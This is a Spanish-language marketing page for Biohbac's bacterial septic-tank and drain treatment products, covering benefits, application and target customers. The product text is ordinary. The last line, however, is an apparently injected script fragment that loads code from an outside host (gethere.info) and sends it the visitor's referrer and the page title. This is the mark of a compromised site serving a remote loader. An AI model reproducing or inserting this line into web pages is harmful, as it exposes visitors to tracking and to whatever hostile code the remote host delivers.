biohbac-soluciones-ambientales

Comienza a cuidar el medio ambiente optimizando tu proceso en la limpieza de pozos sépticos y drenajes.

Limpieza de pozos sépticos y drenajes

A nivel nacional la cobertura del alcantarillado es limitada, para suplir esta deficiencia se utilizan los pozos sépticos que recogen y tratan las aguas residuales de los inodoros, duchas, lavaderos y otros. Estas aguas posteriormente son filtradas al suelo por medio de láminas filtrantes o campos de infiltración. Sin embargo, que exista la canalización que provee el alcantarillado no garantiza que en los drenajes y tuberías se generen obstrucciones y malos olores, en las ciudades esto se hace evidente en las cajas de paso que conectan con el alcantarillado público. Para Biohbac es muy importante el tratamiento de las aguas residuales domésticas que arriban a los pozos sépticos, tratarlos correctamente previene que se generen malos olores, una excesiva acumulación de lodos, la necesidad de mantenimientos frecuentes y el bloqueo de las líneas de desagüe y de las zonas filtrantes

senora-de-las-bacterias_pozos-septicos-y-drenajes

Beneficios de la limpieza de pozos sépticos y drenajes

tratamiento-pozos-septicos-icono-biohbac Degrada la materia orgánica.

tratamiento-pozos-septicos-icono-biohbac Controla los malos olores.

tratamiento-pozos-septicos-icono-biohbac Disminuye cantidad de succiones.

tratamiento-pozos-septicos-icono-biohbac Mejora la calidad agua residual.

tratamiento-pozos-septicos-icono-biohbac Previene obstrucciones en tuberías de drenaje.

tratamiento-pozos-septicos-icono-biohbac Cumple con normatividad ambiental. 

tratamiento-pozos-septicos-icono-biohbac Facilita el reuso del agua saliente del pozo séptico. 

biohbac_producto_limpieza-de-pozos-septicos-y-drenajes

Para contribuir con el medio ambiente y optimizar el funcionamiento del pozo séptico, La línea de productos PS que sugiere Biohbac contiene al menos 12 cepas de bacterias vivas benéficas capaces de descomponer los principales compuestos orgánicos presentes en las aguas negras. Los productos que sugiere Biohbac pueden ser utilizados para tratar drenajes y pozos sépticos que tengan como destino un campo de infiltración o una lámina filtrante, un tanque de almacenamiento o un reservorio.

¿Cómo funciona el tratamiento de Biohbac en la limpieza de pozos sépticos y drenajes?

icono-biohbac_pozos-septicos

limpieza-drenajes_biohbac_uno

Biohbac cuenta con un grupo de especialistas que lo asesoran en el tratamiento para realizar la adecuada limpieza de pozos sépticos y drenajes, con el fin de calcular la dosis y la frecuencia del producto a aplicar. Éstas dependen de las características de los pozos sépticos, de su capacidad de almacenamiento y otros factores.  

 

limpieza-drenajes_biohbac_dos

Luego de establecer la dosis y la frecuencia, se realiza la aplicación de los productos sugeridos por Biohbac con cepas facultativas de microorganismos que degradan los principales compuestos orgánicos presentes en los pozos sépticos: grasa animal y vegetal, aceites, almidones, proteínas, ácido sulfhídrico y en general todos los desperdicios. Estos microorganismos actúan en todas las fases del sistema y del pozo séptico: drenajes, trampas de grasa, tanques, filtros anaeróbicos y campos de infiltración.

 

limpieza-drenajes_biohbac_tres

Al utilizar los productos recomendados por Biohbac, se controlan los malos olores, se mantienen despejadas las zonas filtrantes y se promueve la remoción de DBO (Demanda Biológica de Oxígeno) y DQO (Demanda Química de Oxígeno).

Interesados en la limpieza de pozos sépticos y drenajes

icono-biohbac_pozos-septicos

biohbac_limpieza-de-drenajes_casas-y-fincas
Casas y fincas

 

biohbac_limpieza-de-drenajes_fincas-productoras
Fincas productoras

 

biohbac_limpieza-de-drenajes_colegios
Colegios y universidades

 

biohbac_limpieza-de-drenajes_clubes
Clubes campestres

 

biohbac_limpieza-de-drenajes_centros-comerciales
Centros comerciales

 

Nuestras soluciones ambientales

Ponte en contacto con nosotros.

biohbac_sas

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;